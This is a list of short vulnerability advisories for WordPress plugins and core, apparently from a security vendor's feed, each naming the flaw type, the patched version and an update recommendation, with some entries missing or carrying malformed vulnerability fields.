Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.16
Recommended Action: Update to version 3.2.16, or a newer patched version

Plugin: World of Warcraft – Armory Table

Vulnerability: Cross-Site Scripting
Patched Version: 0.2.6
Recommended Action: Update to version 0.2.6, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.0.89
Recommended Action: Update to version 1.0.89, or a newer patched version

Plugin: Add Custom Body Class

Plugin: Time Sheets

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Cost of Goods: Product Cost & Profit Calculator for WooCommerce

Vulnerability: Missing Authorization in save_costs
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: BuddyPress BP Gallery Plus

Plugin: DW Question & Answer

Plugin: Request a Quote

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.5.9
Recommended Action: Update to version 5.5.9, or a newer patched version

Plugin: Breadcrumbs Shortcode

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.45
Recommended Action: Update to version 1.45, or a newer patched version

Plugin: Simple Custom Author Profiles

Plugin: Welcome Bar

Vulnerability: Missing Authorization
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Simple Light Weight Social Share (Tweet, Like, Share and Linkedin)

Plugin: Require & Limit Categories, Tags, Featured Image and taxonomies

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.27
Recommended Action: Update to version 1.27, or a newer patched version

Plugin: All-in-One Addons for Elementor – WidgetKit

Vulnerability: WidgetKit <= 2.4.3
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: WP Like Button

Vulnerability: Cross-Site Request Forgery via ‘saveData’
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Sensei LMS – Online Courses, Quizzes, & Learning

Vulnerability: Information Disclosure
Patched Version: 4.5.0
Recommended Action: Update to version 4.5.0, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Cross-Site Request Forgery and PHAR Deserialization
Patched Version: 5.4.0
Recommended Action: Update to version 5.4.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Taxonomy names
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Affiliates Manager

Vulnerability: Admin+ SQL injection
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Store Locator for WordPress with Google Maps – LotsOfLocales

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 3.98.8
Recommended Action: Update to version 3.98.8, or a newer patched version

Plugin: Pixel Cat – Conversion Pixel Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: Analytics Cat – Google Analytics Made Easy

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: MakeStories (for Google Web Stories)

Vulnerability: Cross-Ste Scripting
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Remote Code Execution
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Swim Team

Vulnerability: Directory Traversal
Patched Version: 1.45.1085
Recommended Action: Update to version 1.45.1085, or a newer patched version

Plugin: Image Optimizer, Resizer and CDN – Sirv

Vulnerability: SQL Injection
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Cross-Site Request Forgery via create_profile
Patched Version: 1.0.7.1
Recommended Action: Update to version 1.0.7.1, or a newer patched version

Plugin: Dynamics 365 Integration

Vulnerability: Cross-Site Request Forgery via wp_ajax_wpcrm_log_verbosity
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: URL Params

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: WP Tabs Slides

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Improper Server-Side Checks to Booking Payment Bypass
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.10.2
Recommended Action: Update to version 5.10.2, or a newer patched version

Plugin: Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.23
Recommended Action: Update to version 1.1.23, or a newer patched version

Plugin: Meks Easy Social Share

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Modal Dialog

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.15
Recommended Action: Update to version 3.5.15, or a newer patched version

Plugin: Qubely – Advanced Gutenberg Blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘className’ Block Option
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Vitamin

Vulnerability: Directory Traversal
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WooCommerce Customers Manager

Vulnerability: Cross-Site Request Forgery to Account Creation
Patched Version: 26.6
Recommended Action: Update to version 26.6, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Category Deletion
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Reflected Cross-Site Scripting via REQUEST_URI
Patched Version: 4.9.3
Recommended Action: Update to version 4.9.3, or a newer patched version

Plugin: WooODT Lite – Delivery & pickup date time location for WooCommerce

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: ImageBoss – Images Up To 60% Smaller & CDN

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Tracking Code Manager

Vulnerability: Denial of Service
Patched Version: 1.11.5
Recommended Action: Update to version 1.11.5, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Directory Traversal
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: Cross-Site Request Forgery via ‘clicked’
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: WooCommerce Etsy Integration

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Xorbin Digital Flash Clock

Vulnerability: DOM Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via ipf
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: teachPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.0.5
Recommended Action: Update to version 9.0.5, or a newer patched version

Plugin: GTmetrix for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.4.8
Recommended Action: Update to version 0.4.8, or a newer patched version

Plugin: Booster Elite for WooCommerce

Vulnerability: Authenticated(Subscriber+) Content Injection
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: Cashtomer

Plugin: Easy Video Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.2.3
Recommended Action: Update to version 1.2.2.3, or a newer patched version

Plugin: Brands for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.2.3
Recommended Action: Update to version 3.8.2.3, or a newer patched version

Plugin: Related Sites

Vulnerability: SQL Injection
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Thumbnail carousel slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: WonderPlugin Audio Player

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Knowledge Base

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Broken Link Checker for YouTube

Vulnerability: Cross-Site Request Forgery via plugin_settings_page()
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stock Manager for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: Sign-up Sheets

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Read and Understood

Vulnerability: Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Uploader

Plugin: File Manager Pro – Filester

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Reflected Cross-Site Scripting via Color Settings
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.69
Recommended Action: Update to version 1.5.69, or a newer patched version

Plugin: Site Editor

Plugin: Crazy Bone

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.6.0
Recommended Action: Update to version 0.6.0, or a newer patched version

Core: WordPress

Vulnerability: Deserialization via Widgets
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Quick Paypal Payments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.7.26
Recommended Action: Update to version 5.7.26, or a newer patched version

Plugin: KONTXT Improves WordPress Search

Plugin: Ultimate Addons for Elementor

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.30.0
Recommended Action: Update to version 1.30.0, or a newer patched version

Plugin: Local Delivery Drivers for WooCommerce

Vulnerability: Missing Authorization to Driver Account Takeover
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Contact Form 7 Redirect & Thank You Page

Vulnerability: Cross-Site Request Forgery via cf7rl_admin_table
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: RokIntroScroller

Vulnerability: Denial of Service
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WP Symposium

Vulnerability: Arbitrary File Upload
Patched Version: 11.12.24
Recommended Action: Update to version 11.12.24, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Arbitrary File Upload in File Manager
Patched Version: 1.5.61
Recommended Action: Update to version 1.5.61, or a newer patched version

Plugin: Xtreme Locator

Plugin: Custom Field Suite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: a3 Portfolio

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: GetResponse for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.5.32
Recommended Action: Update to version 5.5.32, or a newer patched version

Plugin: WP Survey And Quiz Tool

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Database Reset

Vulnerability: Unauthenticated Database Reset
Patched Version: 3.15
Recommended Action: Update to version 3.15, or a newer patched version

Plugin: BSK PDF Manager

Vulnerability: Admin+ SQL Injection
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: NewStatPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WordPress Spreadsheet

Plugin: Events Made Easy

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.2.24
Recommended Action: Update to version 2.2.24, or a newer patched version

Plugin: 博客社交分享组件

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Authenticated (Administrator+) Arbitrary Code Execution
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘addRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Broken Link Checker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11.9
Recommended Action: Update to version 1.11.9, or a newer patched version

Plugin: WP Cumulus

Vulnerability: Cross-Site Scripting via tagcloud
Patched Version: 1.23
Recommended Action: Update to version 1.23, or a newer patched version

Plugin: Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.9.6
Recommended Action: Update to version 1.4.9.6, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.27.9
Recommended Action: Update to version 3.27.9, or a newer patched version

Plugin: Simple SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.92
Recommended Action: Update to version 1.7.92, or a newer patched version

Plugin: Inline Tweet Sharer – Twitter Sharing Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Edit Comments

Plugin: Responsive Vertical Icon Menu

Vulnerability: Reflected Cross-Site Scripting via ‘id’
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Pricing Table by Supsystic

Vulnerability: Boolean-Based Blind SQL Injections
Patched Version: 1.8.9
Recommended Action: Update to version 1.8.9, or a newer patched version

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Missing Authorization in rx_coupon_from_submit
Patched Version: 1.6.18
Recommended Action: Update to version 1.6.18, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.62
Recommended Action: Update to version 4.62, or a newer patched version

Plugin: Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager

Vulnerability: Authenticated (Author+) Arbitrary File Upload in handle_folders_file_upload
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Contact Form Submissions

Vulnerability: Authenticated SQL Injection
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Lana Downloads Manager

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Passster – Password Protect Pages and Content

Vulnerability: Missing Authentication leading to Sensitive Information Disclosure (Private Post Leakage)
Patched Version: 3.5.5.9
Recommended Action: Update to version 3.5.5.9, or a newer patched version

Plugin: Simple Posts Ticker – Easy, Lightweight & Flexible

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Category Specific RSS feed Subscription

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Login Logout Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Levo Slideshow

Plugin: Usersnap

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 4.17
Recommended Action: Update to version 4.17, or a newer patched version

Plugin: Weblizar Pin Feeds

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: FeedList

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.70.00
Recommended Action: Update to version 2.70.00, or a newer patched version

Plugin: File Uploader

Plugin: Gallery Images Ape

Plugin: WordPress Firewall 2

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Testimonial – WordPress Testimonial Showcase Plugin Grid Plus Testimonial Slider

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.16.0
Recommended Action: Update to version 2.16.0, or a newer patched version

Plugin: Multisite Post Duplicator

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery to Quiz Restoration
Patched Version: 8.1.0
Recommended Action: Update to version 8.1.0, or a newer patched version

Plugin: VK Block Patterns

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.31.2.0
Recommended Action: Update to version 1.31.2.0, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Open Redirect
Patched Version: 3.3.10
Recommended Action: Update to version 3.3.10, or a newer patched version

Plugin: Cartpauj Register Captcha

Vulnerability: CAPTCHA Bypass
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Image SEO – AI-Driven Image SEO Optimizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.2.50
Recommended Action: Update to version 2.2.50, or a newer patched version

Plugin: Slideshow CK

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.4.10
Recommended Action: Update to version 1.4.10, or a newer patched version

Plugin: Contentboxes

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Cross-Site Scripting
Patched Version: 6.9.1
Recommended Action: Update to version 6.9.1, or a newer patched version

Plugin: WP Blogs' Planetarium

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_save_sort_order
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Memphis Documents Library

Vulnerability: Remote File Inclusion
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: SQL Injection
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 5.2.4.6
Recommended Action: Update to version 5.2.4.6, or a newer patched version

Plugin: Business Hours Indicator

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Downloads Manager

Plugin: Page scroll to id

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.20
Recommended Action: Update to version 4.20, or a newer patched version

Plugin: flash-photo-gallery

Plugin: Enhanced Plugin Admin

Vulnerability: Cross-Site Request Forgery via epa_options_page
Patched Version: 1.17
Recommended Action: Update to version 1.17, or a newer patched version

Plugin: Woocommerce WordPress Auctions

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Slideshow SE

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: Authentciated (Admin+) SQL Injection via orderby
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: Smart Cookie Kit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Rating-Widget: Star Review System

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.9.0
Recommended Action: Update to version 2.9.0, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Reflected Cross-Site Scripting via id
Patched Version: 7.5.35.7212
Recommended Action: Update to version 7.5.35.7212, or a newer patched version

Plugin: reSmush.it : The original free image compressor and optimizer plugin

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 0.4.6
Recommended Action: Update to version 0.4.6, or a newer patched version

Plugin: Side Menu – add fixed side buttons

Vulnerability: SQL Injection
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Hero Maps Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Authenticated(Subscriber+) SQL Injection via id
Patched Version: 1.14.15
Recommended Action: Update to version 1.14.15, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: RokStories

Vulnerability: Abuse of Functionality
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: Manage Upload Limit

Vulnerability: Reflected Cross-Site Scripting via upload_limit
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress

Vulnerability: Privilege Escalation
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: ND Shortcodes

Vulnerability: Authenticated (Subscriber+) Local File Inclusion
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: duoFAQ – Responsive, Flat, Simple FAQ

Vulnerability: Responsive, Flat, Simple FAQ <= 1.4.8
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: SQL Injection
Patched Version: 3.7.40
Recommended Action: Update to version 3.7.40, or a newer patched version

Plugin: The Events Calendar

Vulnerability: Open Redirect
Patched Version: 4.1.1.1
Recommended Action: Update to version 4.1.1.1, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: 3.1.3
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: MailCWP

Vulnerability: Arbitrary File Upload
Patched Version: 1.110
Recommended Action: Update to version 1.110, or a newer patched version

Plugin: Popup, Optin Form & Email Newsletters for Mailchimp, HubSpot, AWeber – MailOptin

Vulnerability: Authorization Bypass
Patched Version: 1.2.35.2
Recommended Action: Update to version 1.2.35.2, or a newer patched version

Plugin: Hotjar Connecticator

Plugin: Simple Job Board

Vulnerability: Cross-Site Request Forgery via sjb_save_settings_section
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: WP Captcha

Vulnerability: CAPTCHA Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Meta pixel for WordPress

Vulnerability: Cross-site Request Forgery to Stored Cross-site Scripting and Settings Deletion via wp_ajax_(save|delete)_fbe_settings
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: WP Subtitle

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Spryng Payments for WooCommerce

Plugin: No CAPTCHA reCAPTCHA for WooCommerce

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting via Plugin Settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: mTouch Quiz

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Easy Call Now by ThikShare

Vulnerability: Cross-Site Request Forgery via settings_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: No subtitle
Patched Version: 1.2.30
Recommended Action: Update to version 1.2.30, or a newer patched version

Plugin: WP e-Commerce

Vulnerability: Arbitrary File Upload
Patched Version: 3.6.8 RC1
Recommended Action: Update to version 3.6.8 RC1, or a newer patched version

Plugin: Markdown on Save Improved

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WooCommerce Checkout Field Manager

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 18.0
Recommended Action: Update to version 18.0, or a newer patched version

Plugin: BuddyPress

Vulnerability: Privilege Escalation
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Cross-Site Request Forgery to Privilege Escalation
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: WP Stripe Checkout

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.2.21
Recommended Action: Update to version 1.2.2.21, or a newer patched version

Plugin: SrbTransLatin – Serbian Latinisation

Vulnerability: Cross-Site Scripting
Patched Version: 1.47
Recommended Action: Update to version 1.47, or a newer patched version

Plugin: DukaPress

Vulnerability: Directory Traversal
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: WP-ContactForm

Plugin: MainWP Links Manager Extension

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: SQL Injection
Patched Version: 7.1.14
Recommended Action: Update to version 7.1.14, or a newer patched version

Plugin: Simple File Downloader

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Reroute Email

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.8.7
Recommended Action: Update to version 4.8.7, or a newer patched version

